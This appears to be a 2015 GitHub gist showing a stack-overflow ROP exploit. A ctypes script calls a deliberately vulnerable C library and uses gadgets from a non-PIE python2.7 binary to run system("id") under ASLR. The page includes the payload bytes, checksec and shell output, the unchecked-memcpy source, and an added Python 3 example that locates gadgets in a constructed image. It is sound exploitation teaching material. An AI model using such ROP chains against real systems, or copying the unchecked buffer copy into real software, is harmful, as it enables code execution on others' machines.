@ChaosData

ChaosData/ex.py Secret

Created May 6, 2015 04:28
Python ctypes exploitation example via python2.7 binary not being compiled with -fPIE
from ctypes import *
libName = './libpwn.so'
libpwn = CDLL(libName)
# pwnme() memcpy()s `len` bytes into a 128-byte stack buffer with no canary:
# 128 bytes of buf + 8 bytes of saved rbp puts the return address at offset 136
payload = "A"*136 # buffer overflow
# ROP chain: system("id"). The addresses are absolute because /usr/bin/python2.7 is
# not PIE, so ASLR does not move them; the NUL bytes inside the 8-byte little-endian
# values are fine because memcpy() copies a fixed length rather than stopping at NUL.
payload += "\xd4\x8a\x41\x00\x00\x00\x00\x00" # 0x0000000000418ad4 ; pop rdi; ret ;; from /usr/bin/python2.7 ; thanks https://github.com/JonathanSalwan/ROPgadget
payload += "\x19\xcb\x40\x00\x00\x00\x00\x00" # 0x000000000040cb19 ; "id\x00", the tail of the string "setresgid\x00" in /usr/bin/python2.7 ; becomes rdi, the argument to system()
payload += '\x30\x68\x41\x00\x00\x00\x00\x00' # 0x0000000000416830 ; system@plt from /usr/bin/python2.7
print libpwn.pwnme(create_string_buffer(payload, len(payload)), len(payload))
$ uname -a # Ubuntu 14.04 x86_64
Linux ubuntu 3.13.0-43-generic #72-Ubuntu SMP Mon Dec 8 19:35:06 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
$ cat /proc/sys/kernel/randomize_va_space # yes, aslr is on
2
$ bash checksec.sh --file /usr/bin/python2.7 # from http://trapkit.de/tools/checksec.sh
RELRO STACK CANARY NX PIE RPATH RUNPATH FILE
Partial RELRO Canary found NX enabled No PIE No RPATH No RUNPATH /usr/bin/python2.7
$ gcc -std=c11 -Wall -fPIC -fPIE -Wl,-z,relro,-z,now -fno-stack-protector -shared -o libpwn.so pwn.c # ok, i cheated, stack cookies are disabled to make this easier
$ bash checksec.sh --file libpwn.so
RELRO STACK CANARY NX PIE RPATH RUNPATH FILE
Full RELRO No canary found NX enabled DSO No RPATH No RUNPATH libpwn.so
$ python ex.py
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAԊA
uid=1000(jtd) gid=1000(jtd) groups=1000(jtd),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),124(sambashare)
[1] 68603 segmentation fault (core dumped) python ex.py
#include <stdio.h>
#include <string.h>
#include <signal.h>

/* Deliberately vulnerable: len comes from the caller and is never checked
 * against sizeof(buf), so a payload longer than 128 + 8 bytes overwrites the
 * saved rbp and then the return address (no stack canary, see the gcc flags). */
int pwnme(char* str, int len) {
    char buf[128] = {0};
    memcpy(buf, str, len);
    puts(buf);
    return 4;
}
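Added example, not code from the gist: a Python 3 script that packs the same chain with struct.pack and shows how the two absolute addresses ex.py hard-codes (a `pop rdi; ret` gadget and the `id\0` tail of `setresgid\0`) are located in a non-PIE image, the way a gadget finder or a `strings`/`grep` pass does. The byte image, its base address and the SYSTEM_PLT slot are constructed for the example and are not the real /usr/bin/python2.7 layout; the only real values are the gist's three addresses, which build_payload() reproduces byte for byte.

```python
"""Added example (not part of the original gist): rebuild the ex.py payload
with struct.pack and locate the gadget and string a non-PIE binary hands us.
The image below is constructed for the example; its offsets are illustrative."""
import struct

# Frame layout of pwnme() in pwn.c: char buf[128], then the saved rbp, then
# the return address. With no stack canary, 136 bytes of filler reach it.
BUF_SIZE = 128
SAVED_RBP = 8


def find_all(image, needle, base):
    """Virtual addresses of every occurrence of `needle` in an image mapped at
    `base`. Assumes file offset == vaddr - base (a single flat mapping), an
    assumption made only to keep the example self-contained."""
    hits = []
    pos = image.find(needle)
    while pos != -1:
        hits.append(base + pos)
        pos = image.find(needle, pos + 1)
    return hits


def find_gadget(image, base):
    """Find 'pop rdi; ret' (bytes 5f c3) the way a gadget finder does: scan
    for the pattern anywhere in the image, instruction alignment ignored."""
    return find_all(image, b"\x5f\xc3", base)


def find_string_tail(image, base, wanted, inside):
    """Address of `wanted` as the NUL-terminated suffix of the longer string
    `inside` (the gist reuses the "id\\0" at the end of "setresgid\\0")."""
    assert inside.endswith(wanted)
    addrs = find_all(image, inside + b"\x00", base)
    return [a + len(inside) - len(wanted) for a in addrs]


def build_payload(pop_rdi, arg, system_plt, buf_size=BUF_SIZE):
    """filler | pop rdi; ret | pointer to "id" | system@plt.
    Little-endian 64-bit addresses contain NUL bytes; that is harmless here
    because pwnme() copies with memcpy and an explicit length, not strcpy."""
    chain = struct.pack("<QQQ", pop_rdi, arg, system_plt)
    return b"A" * (buf_size + SAVED_RBP) + chain


# Constructed stand-in for a non-PIE image mapped at 0x400000.
BASE = 0x400000
IMAGE = bytearray(b"\x90" * 0x100)
IMAGE[0x20:0x22] = b"\x5f\xc3"          # pop rdi; ret
IMAGE[0x40:0x4a] = b"setresgid\x00"      # "id\0" therefore starts at 0x47
IMAGE = bytes(IMAGE)
SYSTEM_PLT = BASE + 0x80                 # assumed PLT slot for system()


def example():
    """Resolve both addresses from the image and assemble the chain."""
    gadget = find_gadget(IMAGE, BASE)[0]
    id_str = find_string_tail(IMAGE, BASE, b"id", b"setresgid")[0]
    return build_payload(gadget, id_str, SYSTEM_PLT)


if __name__ == "__main__":
    payload = example()
    print(len(payload), payload[-24:].hex())
    # To fire it as ex.py does (needs the gist's libpwn.so beside the script):
    #   from ctypes import CDLL, create_string_buffer
    #   CDLL("./libpwn.so").pwnme(create_string_buffer(payload, len(payload)), len(payload))
```

Against the real binary the flat-mapping assumption in find_all() does not hold; the file offset of a hit has to be translated to a virtual address through the ELF program headers (or simply read off a disassembler), which is what ROPgadget does for the gadget and what the gist's comments already record for the string.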